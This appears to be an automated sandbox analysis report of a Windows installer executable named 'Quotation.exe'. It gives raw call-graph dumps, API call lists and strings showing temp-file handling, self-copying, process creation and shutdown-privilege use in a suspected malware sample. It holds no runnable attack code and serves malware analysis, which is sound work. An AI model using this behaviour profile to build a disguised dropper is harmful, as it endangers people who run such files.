404ac5 CoTaskMemFree 5889->5893 5889->5894 5895 404b53 5890->5895 5896 4044a0 22 API calls 5891->5896 5898 405df0 3 API calls 5893->5898 5894->5931 5935 405b65 GetDlgItemTextW 5894->5935 5936 406521 lstrcpynW 5895->5936 5899 404a2c 5896->5899 5897->5882 5900 404ad2 5898->5900 5934 4044d5 SendMessageW 5899->5934 5903 404b09 SetDlgItemTextW 5900->5903 5908 40655e 21 API calls 5900->5908 5903->5894 5904 404a32 5906 406915 5 API calls 5904->5906 5905 404b6a 5907 406915 5 API calls 5905->5907 5906->5877 5914 404b71 5907->5914 5909 404af1 lstrcmpiW 5908->5909 5909->5903 5912 404b02 lstrcatW 5909->5912 5910 404bb2 5937 406521 lstrcpynW 5910->5937 5912->5903 5913 404bb9 5915 405e9b 4 API calls 5913->5915 5914->5910 5918 405e3c 2 API calls 5914->5918 5920 404c0a 5914->5920 5916 404bbf GetDiskFreeSpaceW 5915->5916 5919 404be3 MulDiv 5916->5919 5916->5920 5918->5914 5919->5920 5921 404c7b 5920->5921 5923 404e16 24 API calls 5920->5923 5922 404c9e 5921->5922 5924 40140b 2 API calls 5921->5924 5938 4044c2 KiUserCallbackDispatcher 5922->5938 5925 404c68 5923->5925 5924->5922 5927 404c7d SetDlgItemTextW 5925->5927 5928 404c6d 5925->5928 5927->5921 5930 404d4d 24 API calls 5928->5930 5929 404cba 5929->5931 5932 4048ea SendMessageW 5929->5932 5930->5921 5931->5887 5932->5931 5933->5878 5934->5904 5935->5885 5936->5905 5937->5913 5938->5929 5939 401914 5940 402dab 21 API calls 5939->5940 5941 40191b 5940->5941 5942 405b81 MessageBoxIndirectW 5941->5942 5943 401924 5942->5943 4563 402896 4564 40289d 4563->4564 4565 402bae 4563->4565 4566 402d89 21 API calls 4564->4566 4567 4028a4 4566->4567 4568 4028b3 SetFilePointer 4567->4568 4568->4565 4569 4028c3 4568->4569 4571 406468 wsprintfW 4569->4571 4571->4565 5944 401f17 5945 402dab 21 API calls 5944->5945 5946 401f1d 5945->5946 5947 402dab 21 API calls 5946->5947 5948 401f26 5947->5948 5949 402dab 21 API calls 5948->5949 5950 401f2f 5949->5950 5951 402dab 21 API calls 5950->5951 5952 401f38 5951->5952 5953 401423 28 API calls 5952->5953 5954 401f3f 5953->5954 5961 405b47 ShellExecuteExW 5954->5961 5956 401f87 5958 402933 5956->5958 5962 4069c0 WaitForSingleObject 5956->5962 5959 401fa4 CloseHandle 5959->5958 5961->5956 5963 4069da 5962->5963 5964 4069ec GetExitCodeProcess 5963->5964 5965 406951 2 API calls 5963->5965 5964->5959 5966 4069e1 WaitForSingleObject 5965->5966 5966->5963 5967 402f98 5968 402fc3 5967->5968 5969 402faa SetTimer 5967->5969 5970 403018 5968->5970 5971 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5968->5971 5969->5968 5971->5970 5972 40551a 5973 40552a 5972->5973 5974 40553e 5972->5974 5975 405530 5973->5975 5976 405587 5973->5976 5977 405546 IsWindowVisible 5974->5977 5983 40555d 5974->5983 5979 4044ec SendMessageW 5975->5979 5978 40558c CallWindowProcW 5976->5978 5977->5976 5980 405553 5977->5980 5981 40553a 5978->5981 5979->5981 5982 404e5b 5 API calls 5980->5982 5982->5983 5983->5978 5984 404edb 4 API calls 5983->5984 5984->5976 5985 401d1c 5986 402d89 21 API calls 5985->5986 5987 401d22 IsWindow 5986->5987 5988 401a25 5987->5988 5989 40149e 5990 4023a2 5989->5990 5991 4014ac PostQuitMessage 5989->5991 5991->5990 4771 401ba0 4772 401bf1 4771->4772 4773 401bad 4771->4773 4775 401bf6 4772->4775 4776 401c1b GlobalAlloc 4772->4776 4774 401c36 4773->4774 4779 401bc4 4773->4779 4778 40655e 21 API calls 4774->4778 4785 4023a2 4774->4785 4775->4785 4792 406521 lstrcpynW 4775->4792 4777 40655e 21 API calls 4776->4777 4777->4774 4781 40239c 4778->4781 4790 406521 lstrcpynW 4779->4790 4781->4785 4793 405b81 4781->4793 4783 401c08 GlobalFree 4783->4785 4784 401bd3 4791 406521 lstrcpynW 4784->4791 4788 401be2 4797 406521 lstrcpynW 4788->4797 4790->4784 4791->4788 4792->4783 4794 405b96 4793->4794 4795 405be2 4794->4795 4796 405baa MessageBoxIndirectW 4794->4796 4795->4785 4796->4795 4797->4785 4808 403fa1 4809 403fb9 4808->4809 4810 40411a 4808->4810 4809->4810 4811 403fc5 4809->4811 4812 40416b 4810->4812 4813 40412b GetDlgItem GetDlgItem 4810->4813 4814 403fd0 SetWindowPos 4811->4814 4815 403fe3 4811->4815 4817 4041c5 4812->4817 4828 401389 2 API calls 4812->4828 4816 4044a0 22 API calls 4813->4816 4814->4815 4819 403fec ShowWindow 4815->4819 4820 40402e 4815->4820 4821 404155 SetClassLongW 4816->4821 4822 404115 4817->4822 4881 4044ec 4817->4881 4823 404107 4819->4823 4824 40400c GetWindowLongW 4819->4824 4825 404036 DestroyWindow 4820->4825 4826 40404d 4820->4826 4827 40140b 2 API calls 4821->4827 4903 404507 4823->4903 4824->4823 4831 404025 ShowWindow 4824->4831 4832 404429 4825->4832 4833 404052 SetWindowLongW 4826->4833 4834 404063 4826->4834 4827->4812 4829 40419d 4828->4829 4829->4817 4835 4041a1 SendMessageW 4829->4835 4831->4820 4832->4822 4839 40445a ShowWindow 4832->4839 4833->4822 4834->4823 4838 40406f GetDlgItem 4834->4838 4835->4822 4836 40140b 2 API calls 4851 4041d7 4836->4851 4837 40442b DestroyWindow EndDialog 4837->4832 4840 404080 SendMessageW IsWindowEnabled 4838->4840 4841 40409d 4838->4841 4839->4822 4840->4822 4840->4841 4843 4040aa 4841->4843 4844 4040f1 SendMessageW 4841->4844 4845 4040bd 4841->4845 4855 4040a2 4841->4855 4842 40655e 21 API calls 4842->4851 4843->4844 4843->4855 4844->4823 4848 4040c5 4845->4848 4849 4040da 4845->4849 4847 4044a0 22 API calls 4847->4851 4897 40140b 4848->4897 4853 40140b 2 API calls 4849->4853 4850 4040d8 4850->4823 4851->4822 4851->4836 4851->4837 4851->4842 4851->4847 4872 40436b DestroyWindow 4851->4872 4884 4044a0 4851->4884 4854 4040e1 4853->4854 4854->4823 4854->4855 4900 404479 4855->4900 4857 404252 GetDlgItem 4858 404267 4857->4858 4859 40426f ShowWindow KiUserCallbackDispatcher 4857->4859 4858->4859 4887 4044c2 KiUserCallbackDispatcher 4859->4887 4861 404299 EnableWindow 4866 4042ad 4861->4866 4862 4042b2 GetSystemMenu EnableMenuItem SendMessageW 4863 4042e2 SendMessageW 4862->4863 4862->4866 4863->4866 4866->4862 4888 4044d5 SendMessageW 4866->4888 4889 403f82 4866->4889 4892 406521 lstrcpynW 4866->4892 4868 404311 lstrlenW 4869 40655e 21 API calls 4868->4869 4870 404327 SetWindowTextW 4869->4870 4893 401389 4870->4893 4872->4832 4873 404385 CreateDialogParamW 4872->4873 4873->4832 4874 4043b8 4873->4874 4875 4044a0 22 API calls 4874->4875 4876 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4875->4876 4877 401389 2 API calls 4876->4877 4878 404409 4877->4878 4878->4822 4879 404411 ShowWindow 4878->4879 4880 4044ec SendMessageW 4879->4880 4880->4832 4882 404504 4881->4882 4883 4044f5 SendMessageW 4881->4883 4882->4851 4883->4882 4885 40655e 21 API calls 4884->4885 4886 4044ab SetDlgItemTextW 4885->4886 4886->4857 4887->4861 4888->4866 4890 40655e 21 API calls 4889->4890 4891 403f90 SetWindowTextW 4890->4891 4891->4866 4892->4868 4895 401390 4893->4895 4894 4013fe 4894->4851 4895->4894 4896 4013cb MulDiv SendMessageW 4895->4896 4896->4895 4898 401389 2 API calls 4897->4898 4899 401420 4898->4899 4899->4855 4901 404480 4900->4901 4902 404486 SendMessageW 4900->4902 4901->4902 4902->4850 4904 4045ca 4903->4904 4905 40451f GetWindowLongW 4903->4905 4904->4822 4905->4904 4906 404534 4905->4906 4906->4904 4907 404561 GetSysColor 4906->4907 4908 404564 4906->4908 4907->4908 4909 404574 SetBkMode 4908->4909 4910 40456a SetTextColor 4908->4910 4911 404592 4909->4911 4912 40458c GetSysColor 4909->4912 4910->4909 4913 4045a3 4911->4913 4914 404599 SetBkColor 4911->4914 4912->4911 4913->4904 4915 4045b6 DeleteObject 4913->4915 4916 4045bd CreateBrushIndirect 4913->4916 4914->4913 4915->4916 4916->4904 5992 402621 5993 402dab 21 API calls 5992->5993 5994 402628 5993->5994 5997 406011 GetFileAttributesW CreateFileW 5994->5997 5996 402634 5997->5996 6005 4025a3 6006 402deb 21 API calls 6005->6006 6007 4025ad 6006->6007 6008 402d89 21 API calls 6007->6008 6009 4025b6 6008->6009 6010 4025d2 RegEnumKeyW 6009->6010 6011 4025de RegEnumValueW 6009->6011 6013 402933 6009->6013 6012 4025f3 RegCloseKey 6010->6012 6011->6012 6012->6013 4981 4015a8 4982 402dab 21 API calls 4981->4982 4983 4015af SetFileAttributesW 4982->4983 4984 4015c1 4983->4984 6015 401fa9 6016 402dab 21 API calls 6015->6016 6017 401faf 6016->6017 6018 4055a6 28 API calls 6017->6018 6019 401fb9 6018->6019 6020 405b04 2 API calls 6019->6020 6022 401fbf 6020->6022 6021 402933 6022->6021 6023 401fe2 CloseHandle 6022->6023 6025 4069c0 5 API calls 6022->6025 6023->6021 6026 401fd4 6025->6026 6026->6023 6028 406468 wsprintfW 6026->6028 6028->6023 4985 4021af 4986 402dab 21 API calls 4985->4986 4987 4021b6 4986->4987 4988 402dab 21 API calls 4987->4988 4989 4021c0 4988->4989 4990 402dab 21 API calls 4989->4990 4991 4021ca 4990->4991 4992 402dab 21 API calls 4991->4992 4993 4021d4 4992->4993 4994 402dab 21 API calls 4993->4994 4995 4021de 4994->4995 4996 40221d CoCreateInstance 4995->4996 4997 402dab 21 API calls 4995->4997 5000 40223c 4996->5000 4997->4996 4998 401423 28 API calls 4999 4022fb 4998->4999 5000->4998 5000->4999 6029 40202f 6030 402dab 21 API calls 6029->6030 6031 402036 6030->6031 6032 406915 5 API calls 6031->6032 6033 402045 6032->6033 6034 402061 GlobalAlloc 6033->6034 6039 4020d1 6033->6039 6035 402075 6034->6035 6034->6039 6036 406915 5 API calls 6035->6036 6037 40207c 6036->6037 6038 406915 5 API calls 6037->6038 6040 402086 6038->6040 6040->6039 6044 406468 wsprintfW 6040->6044 6042 4020bf 6045 406468 wsprintfW 6042->6045 6044->6042 6045->6039 6046 40252f 6047 402deb 21 API calls 6046->6047 6048 402539 6047->6048 6049 402dab 21 API calls 6048->6049 6050 402542 6049->6050 6051 40254d RegQueryValueExW 6050->6051 6056 402933 6050->6056 6052 402573 RegCloseKey 6051->6052 6053 40256d 6051->6053 6052->6056 6053->6052 6057 406468 wsprintfW 6053->6057 6057->6052 6058 403bb1 6059 403bbc 6058->6059 6060 403bc0 6059->6060 6061 403bc3 GlobalAlloc 6059->6061 6061->6060 6069 401a35 6070 402dab 21 API calls 6069->6070 6071 401a3e ExpandEnvironmentStringsW 6070->6071 6072 401a52 6071->6072 6074 401a65 6071->6074 6073 401a57 lstrcmpW 6072->6073 6072->6074 6073->6074 5067 4023b7 5068 4023c5 5067->5068 5069 4023bf 5067->5069 5071 402dab 21 API calls 5068->5071 5072 4023d3 5068->5072 5070 402dab 21 API calls 5069->5070 5070->5068 5071->5072 5073 402dab 21 API calls 5072->5073 5075 4023e1 5072->5075 5073->5075 5074 402dab 21 API calls 5076 4023ea WritePrivateProfileStringW 5074->5076 5075->5074 6080 4014b8 6081 4014be 6080->6081 6082 401389 2 API calls 6081->6082 6083 4014c6 6082->6083 5077 402439 5078 402441 5077->5078 5079 40246c 5077->5079 5093 402deb 5078->5093 5081 402dab 21 API calls 5079->5081 5083 402473 5081->5083 5089 402e69 5083->5089 5084 402452 5086 402dab 21 API calls 5084->5086 5088 402459 RegDeleteValueW RegCloseKey 5086->5088 5087 402480 5088->5087 5090 402e76 5089->5090 5091 402e7d 5089->5091 5090->5087 5091->5090 5098 402eae 5091->5098 5094 402dab 21 API calls 5093->5094 5095 402e02 5094->5095 5096 40638e RegOpenKeyExW 5095->5096 5097 402448 5096->5097 5097->5084 5097->5087 5099 40638e RegOpenKeyExW 5098->5099 5100 402edc 5099->5100 5101 402f91 5100->5101 5102 402ee6 5100->5102 5101->5090 5103 402eec RegEnumValueW 5102->5103 5104 402f0f 5102->5104 5103->5104 5105 402f76 RegCloseKey 5103->5105 5104->5105 5106 402f4b RegEnumKeyW 5104->5106 5107 402f54 RegCloseKey 5104->5107 5110 402eae 6 API calls 5104->5110 5105->5101 5106->5104 5106->5107 5108 406915 5 API calls 5107->5108 5109 402f64 5108->5109 5111 402f86 5109->5111 5112 402f68 RegDeleteKeyW 5109->5112 5110->5104 5111->5101 5112->5101 5120 40173a 5121 402dab 21 API calls 5120->5121 5122 401741 SearchPathW 5121->5122 5123 40175c 5122->5123 6084 401d3d 6085 402d89 21 API calls 6084->6085 6086 401d44 6085->6086 6087 402d89 21 API calls 6086->6087 6088 401d50 GetDlgItem 6087->6088 6089 40263d 6088->6089 6090 406c3f 6092 406ac3 6090->6092 6091 40742e 6092->6091 6093 406b44 GlobalFree 6092->6093 6094 406b4d GlobalAlloc 6092->6094 6095 406bc4 GlobalAlloc 6092->6095 6096 406bbb GlobalFree 6092->6096 6093->6094 6094->6091 6094->6092 6095->6091 6095->6092 6096->6095 6097 7342103d 6098 7342101b 5 API calls 6097->6098 6099 73421056 6098->6099

                                                              Executed Functions

                                                              Function 004034FC Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 11 4035e3 5->11 8 4035ef-403603 call 4068a5 lstrlenA 6->8 13 403605-403621 call 406915 * 3 8->13 11->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 25 40362b 21->25 25->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 35 4036c0-4036c5 33->35 36 4036c7-4036ce 33->36 37 4037ce-4037e8 GetTempPathW call 4034cb 34->37 35->35 35->36 38 4036d0-4036d5 36->38 39 4036d6-4036da 36->39 44 403840-40385a DeleteFileW call 403082 37->44 45 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 37->45 38->39 41 4036e0-4036e6 39->41 42 40379b-4037aa call 405e1d 39->42 47 403700-403739 41->47 48 4036e8-4036ef 41->48 42->32 60 4037ac-4037ad 42->60 66 403860-403866 44->66 67 403a47-403a57 call 403b19 OleUninitialize 44->67 45->44 64 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 45->64 54 403756-403790 47->54 55 40373b-403740 47->55 52 4036f1-4036f4 48->52 53 4036f6 48->53 52->47 52->53 53->47 57 403792-403796 54->57 58 403798-40379a 54->58 55->54 61 403742-40374a 55->61 57->58 65 4037bc-4037c9 call 406521 57->65 58->42 60->32 62 403751 61->62 63 40374c-40374f 61->63 62->54 63->54 63->62 64->44 64->67 65->37 70 40386c-403877 call 405e1d 66->70 71 4038ff-403906 call 403bf3 66->71 77 403a59-403a69 call 405b81 ExitProcess 67->77 78 403a7d-403a83 67->78 82 4038c5-4038cf 70->82 83 403879-4038ae 70->83 80 40390b-40390f 71->80 84 403b01-403b09 78->84 85 403a85-403a9b GetCurrentProcess OpenProcessToken 78->85 80->67 86 4038d1-4038df call 405ef8 82->86 87 403914-40393a call 405aec lstrlenW call 406521 82->87 91 4038b0-4038b4 83->91 88 403b0b 84->88 89 403b0f-403b13 ExitProcess 84->89 92 403ad1-403adf call 406915 85->92 93 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 85->93 86->67 106 4038e5-4038fb call 406521 * 2 86->106 110 40394b-403963 87->110 111 40393c-403946 call 406521 87->111 88->89 97 4038b6-4038bb 91->97 98 4038bd-4038c1 91->98 104 403ae1-403aeb 92->104 105 403aed-403af8 ExitWindowsEx 92->105 93->92 97->98 100 4038c3 97->100 98->91 98->100 100->82 104->105 108 403afa-403afc call 40140b 104->108 105->84 105->108 106->71 108->84 116 403968-40396c 110->116 111->110 118 403971-40399b wsprintfW call 40655e 116->118 122 4039a4 call 405acf 118->122 123 40399d-4039a2 call 405a75 118->123 127 4039a9-4039ab 122->127 123->127 128 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 127->128 129 4039ad-4039b7 GetFileAttributesW 127->129 137 403a45 128->137 138 403a08-403a29 call 4062e1 call 40655e call 405b04 128->138 130 4039d8-4039e3 129->130 131 4039b9-4039c2 DeleteFileW 129->131 130->116 134 4039e5 130->134 131->130 133 4039c4-4039d6 call 405c2d 131->133 133->118 133->130 134->67 137->67 146 403a2b-403a35 138->146 147 403a6f-403a7b CloseHandle 138->147 146->137 148 403a37-403a3f call 40687e 146->148 147->137 148->118 148->137
                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 0040351F
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                              • OleInitialize.OLE32(00000000), ref: 0040363A
                                                              • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                              • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Quotation.exe",00000020,"C:\Users\user\Desktop\Quotation.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                              • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                              • wsprintfW.USER32 ref: 0040397B
                                                              • GetFileAttributesW.KERNEL32(1056,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                              • DeleteFileW.KERNEL32(1056), ref: 004039BA
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,1056,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,1056,?), ref: 00405B2D
                                                                • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,1056,?), ref: 00405B3A
                                                                • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                              • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                              • ExitProcess.KERNEL32 ref: 00403A69
                                                              • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,1056,00000000), ref: 00403A70
                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                              • ExitProcess.KERNEL32 ref: 00403B13
                                                                • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$1033$1056$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\ethnocentrism\skggene\Egyptians218$C:\Users\user\ethnocentrism\skggene\Egyptians218$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                              • API String ID: 1813718867-1410604708
                                                              • Opcode ID: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                              • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                              • Opcode Fuzzy Hash: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                              • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E
                                                              Function 004056E5 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 151 4056e5-405700 152 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 40588f-405896 151->153 176 4057eb-4057ee 152->176 177 4057cf-4057e9 SendMessageW * 2 152->177 155 4058c0-4058cd 153->155 156 405898-4058ba GetDlgItem CreateThread CloseHandle 153->156 158 4058eb-4058f5 155->158 159 4058cf-4058d5 155->159 156->155 162 4058f7-4058fd 158->162 163 40594b-40594f 158->163 160 405910-405919 call 404507 159->160 161 4058d7-4058e6 ShowWindow * 2 call 4044d5 159->161 173 40591e-405922 160->173 161->158 166 405925-405935 ShowWindow 162->166 167 4058ff-40590b call 404479 162->167 163->160 170 405951-405957 163->170 174 405945-405946 call 404479 166->174 175 405937-405940 call 4055a6 166->175 167->160 170->160 171 405959-40596c SendMessageW 170->171 178 405972-40599d CreatePopupMenu call 40655e AppendMenuW 171->178 179 405a6e-405a70 171->179 174->163 175->174 180 4057f0-4057fc SendMessageW 176->180 181 4057fe-405815 call 4044a0 176->181 177->176 188 4059b2-4059c7 TrackPopupMenu 178->188 189 40599f-4059af GetWindowRect 178->189 179->173 180->181 190 405817-40582b ShowWindow 181->190 191 40584b-40586c GetDlgItem SendMessageW 181->191 188->179 192 4059cd-4059e4 188->192 189->188 193 40583a 190->193 194 40582d-405838 ShowWindow 190->194 191->179 195 405872-40588a SendMessageW * 2 191->195 196 4059e9-405a04 SendMessageW 192->196 197 405840-405846 call 4044d5 193->197 194->197 195->179 196->196 198 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a2b-405a52 SendMessageW 198->200 200->200 201 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->179
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                              • GetClientRect.USER32(?,?), ref: 0040578F
                                                              • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                              • ShowWindow.USER32(?,00000008), ref: 00405832
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                              • ShowWindow.USER32(00000000), ref: 004058DE
                                                              • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                              • ShowWindow.USER32(00000008), ref: 0040592D
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                              • CreatePopupMenu.USER32 ref: 00405972
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                              • GetWindowRect.USER32(?,?), ref: 004059A6
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                              • OpenClipboard.USER32(00000000), ref: 00405A07
                                                              • EmptyClipboard.USER32 ref: 00405A0D
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
